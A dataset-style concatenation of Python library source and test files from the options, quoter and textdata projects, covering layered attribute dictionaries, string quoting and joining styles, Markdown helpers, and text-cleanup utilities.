def callable_hasattr(target, name):
return hasattr(callable_func(target), name)
```
#### File: options/options/chainstuf.py
```python
from chainmap import ChainMap
class chainstuf(ChainMap):
"""
A stuf-like surfacing of the ChainMap collection (multi-layer dict)
introduced in Python 3. Uses a workalike replacement to make suitable
for Python 2.6, Python 3.2, and PyPy3.
"""
def __init__(self, *maps):
ChainMap.__init__(self, *maps)
def __getattr__(self, key):
for m in self.maps:
try:
return m[key]
except KeyError:
pass
raise KeyError(key)
def __setattr__(self, key, value):
if key == 'maps' or key in self.__dict__:
ChainMap.__setattr__(self, key, value)
else:
self.maps[0][key] = value
```
#### File: options/test/test_chainstuf.py
```python
from options.chainstuf import chainstuf
import sys
import pytest
def test_one():
base = dict(a=1, b=2)
top = dict(a=5)
chain = chainstuf(top, base)
assert chain['a'] == 5
assert chain.a == 5
assert chain['b'] == 2
assert chain.b == 2
with pytest.raises(KeyError):
chain['c']
with pytest.raises(KeyError):
chain.c
assert chain.__getattr__ is not None
def test_chainstuf():
"""Test chainstuf class"""
# make some base dicts
d1 = dict(this=1, that=2)
d2 = dict(roger=99, that=100)
# test simple attribute equivalence
dd = chainstuf(d1, d2)
assert dd.this == 1
assert dd.roger == 99
assert dd.this == dd['this']
assert dd.that == dd['that']
assert dd.roger == dd['roger']
# set value on chainstuf, ensure properly set, in top dict
dd.roger = 'wilco'
assert dd.roger == 'wilco'
assert dd.roger == d1['roger']
# test new_child
dd2 = dd.new_child()
dd2.smorg = 44
assert dd2.smorg == 44
dd.roger = 'roger'
assert dd2.roger == 'roger'
with pytest.raises(KeyError):
dd.nork
def test_files():
# stuf (<0.9.9) had a problem with files being assigned in a stuf()
# constructor. It was fixed in 0.9.10, though not for PyPy. This test
# demonstrates that otherstuf.chainstuf does not manifest this bug. To be
# fair, the bug was in stuf's base collections (stuf and orderedstuf), not
# stuf.chainstuf. So this test is included out of an abundance of caution.
# Get names of files that won't be munged by py.test's capturing mechanism
# (sys.stdout and sys.stderr definitely will be overtaken by py.test, but
# their primitive double-underscore names won't be). This doesn't seem to
# be an issue with Python 2.x, but spuriously screws up the test otherwise
# in Python 3.x (gives false negative, saying module not working when it is)
f1 = sys.__stdout__
f2 = sys.__stderr__
f3 = sys.__stdin__
d1 = dict(a=44, b=f2, c=[f2, f3])
d2 = dict(a=f1)
o = chainstuf(d2, d1)
assert o.a is f1
assert o.b is f2
assert len(o.c) == 2
assert o.c[0] is f2
assert o.c[1] is f3
# first push
oo = o.new_child()
oo.b = f1
oo.c = 12
assert oo.a is f1
assert oo.b is f1
assert oo.c == 12
# now try it with an update
d3 = dict(b=f1, c=12)
oo2 = oo.new_child()
oo2.update(d3)
assert oo2.a is f1
assert oo2.b is f1
assert oo2.c == 12
# second push
ooo = oo.new_child()
ooo.update(dict(a=f2, b=f3))
assert ooo.a is f2
assert ooo.b is f3
assert ooo.c == 12
``` |
{
"source": "jonathaneunice/quoter",
"score": 4
} |
#### File: quoter/quoter/joiner.py
```python
import re
from options import Options
from .util import *
from .quoter import Quoter
from .styleset import *
import six
class Joiner(Quoter):
"""
A type of Quoter that deals with sequences.
"""
options = Quoter.options.add(
sep=', ', # separator between items
twosep=None, # separator between items if only two
lastsep=None, # separator between penultimate and final item
quoter=None, # quoter for individual items
endcaps=None, # quoter for entire joined sequence
)
def __init__(self, **kwargs):
"""
Create a Joiner
"""
Quoter.__init__(self)
opts = self.options = self.__class__.options.push(kwargs)
def __call__(self, seq, **kwargs):
"""
Join the items of a sequence into a string. Implicitly stringifies any
not-string values. Allows specification of the separator between items (and
a special case for the last separator). Allows each item to be optionally
quoted by a function, and the entire list to be optionally quoted with an
endcaps function. A separate suffix and prefix may also be provdied.
"""
opts = self.options.push(kwargs)
def prep(v):
"""
Prepare an item by stringifying and optionally quoting it.
"""
s = stringify(v)
return opts.quoter(s) if opts.quoter else s
seqlist = list(seq)
length = len(seqlist)
if length == 0:
core = ''
elif length == 1:
core = prep(seqlist[0])
elif length == 2 and opts.twosep:
sep = opts.twosep if opts.twosep is not None else opts.sep
core = sep.join(prep(v) for v in seqlist)
else:
start = [ prep(v) for v in seqlist[:-1] ]
final = prep(seqlist[-1])
if opts.lastsep is None:
opts.lastsep = opts.sep
core = opts.lastsep.join([ opts.sep.join(start), final])
pstr, mstr = self._whitespace(opts)
capped = opts.endcaps(core) if opts.endcaps else core
payload = [mstr, blanknone(opts.prefix), pstr, capped, pstr,
blanknone(opts.suffix), mstr]
return self._output(payload, opts)
# TODO: Determine if it makes any sense for Joiners to take *args
join = StyleSet(
factory = Joiner,
instant = False,
immediate = Joiner(),
promote = 'but clone')
# specializations
# A and B. A, B, and C.
and_join = join.and_join = join.but(sep=', ', twosep=' and ', lastsep=', and ')
# A or B. A, B, or C.
or_join = join.or_join = join.but(sep=', ', twosep=' or ', lastsep=', or ')
joinlines = join.joinlines = join.lines = join.but(sep="\n", suffix="\n")
concat = join.concat = join.but(sep='', twosep='', lastsep='')
# TODO: Rationalize with respect to more sophisticated quoter args
# TODO: Add padding and margin, like quoter
items_options = Options(
sep="\n", # separator between items
fmt="{key}: {value!r}",
header=None, # header for entire list
footer=None # footer for entire list
)
def iter_items(items):
if hasattr(items, 'items'): # dict or mapping
for k, v in items.items():
yield k, v
else:
for k, v in enumerate(items):
yield k, v
def items(seq, **kwargs):
opts = items_options.push(kwargs)
formatted_items = [ opts.fmt.format(key=k, value=v) for k,v in iter_items(seq) ]
items_str = opts.sep.join(formatted_items)
if opts.header or opts.footer:
parts = []
if opts.header:
parts.extend([opts.header, opts.sep])
parts.append(items_str)
if opts.footer:
parts.extend([opts.sep, opts.footer])
items_str = ''.join(parts)
return items_str
# TODO: needs to be moved into object struture, like quoter
```
#### File: quoter/quoter/markdown.py
```python
import re
import six
from options import Options, OptionsClass, Prohibited, Transient
from .util import *
from .quoter import Quoter
from .joiner import joinlines
from .styleset import StyleSet
# MD_ATTRS = set(['a', 'p', 'doc', 'h'])
# MD_ATTRS.update(QUOTER_ATTRS)
class MDQuoter(Quoter):
"""
A more sophisticated quoter for Markdown elements.
"""
options = Quoter.options.add(
misc = Prohibited,
)
def __init__(self, *args, **kwargs):
"""
Create an MDQuoter
"""
# Restating basic init to avoid errors of self.__getattribute__
# that can flummox superclass instantiation
super(Quoter, self).__init__()
opts = self.options = self.__class__.options.push(kwargs)
def a(self, text, href, **kwargs):
opts = self.options.push(kwargs)
parts = ["[", text, "](", href, ")"]
return self._output(parts, opts)
def p(self, *args, **kwargs):
opts = self.options.push(kwargs)
return self._output(args, opts)
def doc(self, seq, **kwargs):
opts = self.options.push(kwargs)
return joinlines(seq, sep="\n\n")
# FIXME: kwargs not really used
def h(self, text, level=1, close=False, setext=False, **kwargs):
"""
Headers at varous levels. Either atx style (hashmark prefix)
by default, or Setext (underlining) style optionally.
"""
opts = self.options.push(kwargs)
if setext:
char = '=' if level == 1 else '-'
parts = [text, '\n', char * len(text), '\n']
else:
prefix = "#" * level
parts = [prefix, ' ', text]
if close:
parts.extend([' ', prefix])
return self._output(parts, opts)
def h1(self, text, **kwargs):
kwargs['level'] = 1
return self.h(text, **kwargs)
def h2(self, text, **kwargs):
kwargs['level'] = 2
return self.h(text, **kwargs)
def h3(self, text, **kwargs):
kwargs['level'] = 3
return self.h(text, **kwargs)
def h4(self, text, **kwargs):
kwargs['level'] = 4
return self.h(text, **kwargs)
def h5(self, text, **kwargs):
kwargs['level'] = 5
return self.h(text, **kwargs)
def h6(self, text, **kwargs):
kwargs['level'] = 6
return self.h(text, **kwargs)
def hr(self, **kwargs):
opts = self.options.push(kwargs)
return self._output(['-' * 5], opts)
# see http://daringfireball.net/projects/markdown/syntax
# for basic syntax
# TODO: blockquote
# TODO: code
# TODO: list (ordered)
# TODO: list (unordered)
# TODO: image
# TODO: automatic link
# TODO: footnote
# TODO: table
# TODO: literal asterisks
# TODO: get vsep working
# need this because basic joiners dont do varargs yet
md = StyleSet(
factory = MDQuoter,
immediate = MDQuoter(),
instant = False,
promote = 'but clone p a doc h')
md.i = MDQuoter(prefix="*", suffix="*")
md.b = MDQuoter(prefix="**", suffix="**")
# _md_doc = joinlines.but(sep="\n\n")
# MDQuoter.styles['doc'] = _md_doc
# object.__setattr__(MDQuoter, 'doc') == _md_doc
# some obvious glitches and complexities in __getargument__ setup still,
# given complexity of defining doc method - look into
```
#### File: quoter/quoter/quoter.py
```python
import re
import six
from options import Options, OptionsClass, Prohibited, Transient
from .base import QuoterBase
from .util import *
from .styleset import StyleSet
class BadStyleName(ValueError):
pass
class Quoter(OptionsClass, QuoterBase):
"""
A quote style. Instantiate it with the style information. Call
it with a value to quote the value.
"""
options = Options(
prefix = None,
suffix = None,
pair = Transient,
sep = '',
margin = 0,
padding = 0,
encoding = None,
)
def __init__(self, *args, **kwargs):
"""
Create a quoting style.
"""
opts = self.options = self.__class__.options.push(kwargs)
self._interpret_args(args)
def _interpret_pair(self, opts):
if opts.pair is not Transient:
opts.prefix, opts.suffix = halfstr(opts.pair)
opts.pair = Transient
def _interpret_args(self, args):
"""
Consume 'flat' *args if present when object is constructed.
Interpret them, and possibly also options already set.
"""
opts = self.options
self._interpret_pair(opts)
if args:
used = opts.addflat(args, ['prefix', 'suffix'])
if 'suffix' not in used:
opts.suffix = opts.prefix
# this suffix = prefix behavior appropriate for flat args only
def _whitespace(self, opts):
"""
Compute the appropriate margin and padding strings.
"""
pstr = ' ' * opts.padding if isinstance(opts.padding, int) else opts.padding
mstr = ' ' * opts.margin if isinstance(opts.margin, int) else opts.margin
return (pstr, mstr)
# could extend the padding and margins with tuples to enable
# asymmetric before/after settings
def _output(self, parts, opts):
"""
Given a list of string parts, concatentate them and output
with the given encoding (if any).
"""
outstr = ''.join(parts)
return outstr.encode(opts.encoding) if opts.encoding else outstr
def __call__(self, *args, **kwargs):
"""
Quote the value, according to the current options.
"""
opts = self.options.push(kwargs)
self._interpret_pair(opts)
pstr, mstr = self._whitespace(opts)
sval = opts.sep.join(stringify(a) for a in args)
prefix = opts.prefix or ''
suffix = opts.suffix or ''
parts = [ mstr, prefix, pstr, sval, pstr, suffix, mstr ]
return self._output(parts, opts)
def clone(self, **kwargs):
"""
Create a new instance whose options are chained to this instance's
options (and thence to self.__class__.options). kwargs become the
cloned instance's overlay options.
"""
cloned = self.__class__()
cloned.options = self.options.push(kwargs)
cloned._interpret_pair(cloned.options)
return cloned
# NB clone takes only kwargs, not flat args, contra constructor
but = clone
# create some default named styles
quote = StyleSet(factory=Quoter,
instant=False,
immediate=Quoter("'"))
braces = quote._define("braces", pair='{}')
brackets = quote._define("brackets", pair='[]')
angles = quote._define("angles", pair='<>')
parens = quote._define("parens", pair='()')
qs = single = quote._define("qs single", "'")
qd = double = quote._define("qd double", '"')
qt = triple = quote._define("qt triple", '"""')
qb = backticks = quote._define("qb backticks", "`")
qdb = doublebackticks = quote._define("qdb doublebackticks", "``")
# and some Unicode styles
anglequote = guillemet = quote._define("anglequote guillemet",
pair=six.u('\u00ab\u00bb'))
chevron = quote._define("chevron", pair=six.u('\u2039\u203a'))
curlysingle = quote._define("curlysingle", pair=six.u('\u2018\u2019'))
curlydouble = quote._define("curlydouble", pair=six.u('\u201c\u201d'))
class LambdaQuoter(Quoter):
"""
A Quoter that uses code to decide what quotes to use, based on the value.
"""
options = Quoter.options.add(
func = None,
prefix = Prohibited,
suffix = Prohibited,
pair = Prohibited,
)
def _interpret_args(self, args):
"""
Consume 'flat' *args if present when object is constructed.
Interpret them, and possibly also options already set.
"""
if args:
self.options.addflat(args, ['func'])
def __call__(self, value, **kwargs):
"""
Quote the value, based on the instance's function.
"""
opts = self.options.push(kwargs)
pstr, mstr = self._whitespace(opts)
prefix, value, suffix = opts.func(value)
parts = [mstr, prefix, pstr, stringify(value), pstr, suffix, mstr]
return self._output(parts, opts)
# TODO: Determine if LambdaQuoters can take multiple arguments
lambdaq = StyleSet(
factory=LambdaQuoter,
instant=False,
immediate=LambdaQuoter(lambda v: ('', 'ALL YOUR BASE ARE BELONG TO US', '')))
```
#### File: quoter/test/test_styleset.py
```python
from quoter.styleset import *
from quoter import *
import pytest
def test_basic():
s = StyleSet(Quoter)
s.braces = braces
assert s.braces('this') == '{this}'
def test_setattr():
s = StyleSet(Quoter)
s.bspace = braces.but(padding=1)
assert s.bspace('that') == '{ that }'
def test_getitem():
s = StyleSet(Quoter)
s.braces = braces
assert s['braces'] is braces
assert s['braces']('curly') == '{curly}'
def test_setitem():
s = StyleSet(Quoter)
s['braces'] = braces
assert s['braces'] is braces
assert s.braces is braces
assert s['braces']('curly') == '{curly}'
assert s.braces('curly') == '{curly}'
def test_getattr_and_definition_not_instant():
s = StyleSet(Quoter)
s._define("db", "{{", "}}")
assert s.db("work") == "{{work}}"
with pytest.raises(ValueError):
s.dbspace("{{ ", " }}")("works")
s._define("wook", prefix="WO", suffix="OK")
assert s.wook('this') == "WOthisOK"
def test_getattr_factory_instant():
h = StyleSet(HTMLQuoter, instant=True)
assert h.pre('this', ".work") == "<pre class='work'>this</pre>"
assert h.free('open source', ".liberty") == \
"<free class='liberty'>open source</free>"
def test_immediate():
q = StyleSet(immediate=brackets)
assert q("this") == '[this]'
qnone = StyleSet()
with pytest.raises(KeyError):
qnone("this")
def test_repr():
s = StyleSet()
s.a = 1
s['b'] = 2
assert repr(s) in [ 'StyleSet(a=1, b=2)', 'StyleSet(b=2, a=1)']
def test_examples():
"""
Test examples from the docs
"""
colon = quote._define('colon', ':')
assert colon('this') == quote.colon('this') == ':this:'
assert quote("super") == "'super'"
cq = StyleSet(factory=Quoter,
immediate=Quoter(':'))
cq._define("two", Quoter('::'))
assert cq('this') == ':this:'
assert cq.two('this') == '::this::'
``` |
{
"source": "jonathaneunice/textdata",
"score": 3
} |
#### File: textdata/textdata/core.py
```python
import os
import re
from itertools import groupby
import sys
import warnings
from .util import noquotes, ensure_text, CSTRIP, _PY2
if not _PY2:
basestring = str
__all__ = 'lines text textlines textline words paras'.split()
def lines(source, noblanks=True, dedent=True, lstrip=False, rstrip=True,
expandtabs=False, cstrip=True, join=False):
"""
Grab lines from a string. Discard initial and final lines if blank.
:param str|lines source: Text (or list of text lines) to be processed
:param bool dedent: a common prefix should be stripped from each line (default `True`)
:param bool noblanks: allow no blank lines at all (default `True`)
:param bool lstrip: all left space be stripped from each line (default `False`);
dedent and lstrip are mutually exclusive
:param bool rstrip: all right space be stripped from each line (default `True`)
:param Union[bool,int] expandtabs: should all tabs be expanded? if int, by how much?
:param bool cstrip: strips comment strings from # to end of each line (like Python itself)
:param bool|str join: if False, no effect; otherwise a string used to join the lines
:return: a list of strings
:rtype: list
"""
text = ensure_text(source)
if cstrip:
text = CSTRIP.sub('', text)
if expandtabs:
text = text.expandtabs() if expandtabs is False else text.expandtabs(expandtabs)
textlines = text.splitlines()
# remove blank lines if noblanks
if noblanks:
textlines = [line for line in textlines if line.strip() != '']
else:
# even if intermediate blank lines ok, first and last are due to Python
# formatting
if textlines and textlines[0].strip() == "":
textlines.pop(0)
if textlines and textlines[-1].strip() == "":
textlines.pop()
# TODO: decided if these should be while loops, eating all prefix/suffix blank lines
if dedent and not lstrip:
if expandtabs:
nonblanklines = [line for line in textlines if line.strip() != ""]
else:
# if not expanding all tabs, expand tabs at least for purpose of finding common prefix
nonblanklines = [line.expandtabs() for line in textlines if line.strip() != ""]
prefix = os.path.commonprefix(nonblanklines)
prelen, maxprelen = 0, len(prefix)
while prelen < maxprelen and prefix[prelen] == ' ':
prelen += 1
if prelen:
textlines = [line[prelen:] for line in textlines]
# perform requested left and right space stripping (must be done
# late so as to not interfere with dedent's common prefix detection)
if lstrip and rstrip:
textlines = [line.strip() for line in textlines]
elif lstrip:
textlines = [line.lstrip() for line in textlines]
elif rstrip:
textlines = [line.rstrip() for line in textlines]
if join is False:
return textlines
else:
join = '' if join is True else join
return join.join(textlines)
def text(source, **kwargs):
"""
Like ``lines()``, but returns result as unified text. Useful primarily
because of the nice cleanups ``lines()`` does.
:param str|lines source: Text (or list of text lines) to be processed
:param str join: String to join lines with. Typically newline for line-oriented
text but change to " " for a single continous line.
:return: the cleaned string
:rtype: str
"""
kwargs.setdefault('join', '\n')
return lines(source, **kwargs)
def textlines(*args, **kwargs):
"""
Deprecated alias for ``test``. Use it instead.
"""
warnings.warn('Depreacted alias for text(). Use it instead.', DeprecationWarning)
return text(*args, **kwargs)
def textline(source, cstrip=True):
"""
Like ``text()``, but returns result as unified string that is not
line-oriented. Really a special case of ``text()``
:param str|list source:
:param bool cstrip: Should comments be stripped? (default: ``True``)
:return: the cleaned string
:rtype: str
"""
pars = paras(source, keep_blanks=False, join=" ", cstrip=cstrip)
return "\n\n".join(pars)
# define word regular expression and pre-define quotes
WORDRE = re.compile(r"""\s*(?P<word>"[^"]*"|'[^']*'|\S+)\s*""")
def words(source, cstrip=True, sep=None):
"""
Returns a sequence of words, like qw() in Perl. Similar to s.split(),
except that it respects quoted spans for the occasional word (really,
phrase) with spaces included.) If the ``sep`` argument is provided,
words are split on that boundary (rather like ``str.split()``). Either
the standard space and possibly-quoted word behavior should be used,
or the explicit separator. They don't cooperate well.
Like ``lines``, removes comment strings by
default.
:param str|list source: Text (or list of text lines) to gather words from
:param bool cstrip: Should comments be stripped? (default: ``True``)
:param Optional[str] sep: Optional explicit separator.
:return: list of words/phrases
:rtype: list
"""
text = ensure_text(source)
if cstrip:
text = CSTRIP.sub('', text)
if sep is None:
text = text.strip()
parts = re.findall(WORDRE, text)
return [noquotes(p) for p in parts]
else:
parts = text.split(sep)
return [p.strip() for p in parts]
def paras(source, keep_blanks=False, join=False, cstrip=True):
"""
Given a string or list of text lines, return a list of lists where each
sub list is a paragraph (list of non-blank lines). If the source is a
string, use ``lines`` to split into lines. Optionally can also keep the
runs of blanks, and/or join the lines in each paragraph with a desired
separator (likely a newline if you want to preserve multi-line structure
in the resulting string, or " " if you don't). Like ``words``,
``lines``, and ``textlines``, will also strip comments by default.
:param str|list source: Text (or list of text lines) from which paras are to be gathered
:param keep_blanks: Should internal blank lines be retained (default: ``False``)
:param bool|str join: Should paras be joined into a string? (default: ``False``).
:param bool cstrip: Should comments be stripped? (default: ``True``)
:return: list of strings (each a paragraph)
:rtype: list
"""
# make sure we have lines, with suitable cleanups
# note that lines() will guarantee ensure_text()
sourcelines = lines(source, noblanks=False, cstrip=cstrip)
# get paragraphs
results = []
line_not_blank = lambda l: l.strip() != ""
for non_blank, run in groupby(sourcelines, line_not_blank):
if non_blank or keep_blanks:
run_list = list(run)
payload = join.join(run_list) if join is not False else run_list
results.append(payload)
return results
```
#### File: textdata/textdata/eval.py
```python
from ast import literal_eval as ast_literal_eval
from .util import noquotes
def literal_eval(s):
"""
Wrapper around ``ast.literal_eval`` that returns its return value,
if possible, but returns the original string in cases where
``ast.literal_eval`` raises an exception.
"""
try:
return ast_literal_eval(s)
except (ValueError, SyntaxError):
return s
# evaluation functions
identity = lambda s: s
minimal = lambda s: s.strip()
natural = lambda s: literal_eval(s.strip())
full = lambda s: literal_eval(noquotes(s.strip()))
# mapping of evaluate parameter to evaluation functions
EVALUATE = {
'none': identity,
None: identity,
'minimal': minimal,
False: minimal,
'natural': natural,
True: natural,
'full': full,
}
def evaluation(value, how='natural'):
"""
Standard value evaluator. Defaults to the "natural"
Python literal encoding.
"""
if hasattr(how, '__call__'):
evaluator = how
else:
try:
evaluator = EVALUATE[how]
except KeyError:
raise ValueError('{!r} not a known evaluation mode'.format(how))
try:
return evaluator(value)
except Exception as e:
print(e)
return minimal(value)
```
#### File: textdata/textdata/util.py
```python
import re
import sys
try:
from itertools import tee, filterfalse
except ImportError:
# Accommodate prior name for filterfalse in Python 2
from itertools import tee, ifilterfalse as filterfalse
_PY2 = sys.version_info[0] == 2
if not _PY2:
basestring = str
# regex to find Python comments in the middle of (multiline) strings
CSTRIP = re.compile(r'#.*$', re.MULTILINE) # comment stripping regex
def ensure_text(source):
"""
Given either text or an iterable, return the corresponding text. This
common pre-process function allows ``textdata`` routines to take varied
input, yet confidently process considering only the text case.
"""
if isinstance(source, basestring):
return source
else:
# a list, tuple, iterator, or generator giving lines of text;
# convert to a single text for standard cleanups
return "\n".join(list(source))
QUOTES = ("'", '"')
def noquotes(s):
"""
If the given string starts and ends with a quote symbol, return its 'middle' with
that quote symbol stripped off both ends.
:param str s: Input string
:return: String without quotes
:rtype: str
"""
if s.startswith(QUOTES) and s.endswith(QUOTES):
return s.strip(s[0])
else:
return s
def partition(pred, iterable):
"""
Use a predicate to partition entries into false entries and true entries.
Derived from Python itertools cookbook at
https://docs.python.org/3/library/itertools.html
But unlike default definition, returns lists rather than generators.
"""
# partition(is_odd, range(10)) --> 0 2 4 6 8 and 1 3 5 7 9
t1, t2 = tee(iterable)
return list(filterfalse(pred, t1)), list(filter(pred, t2))
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.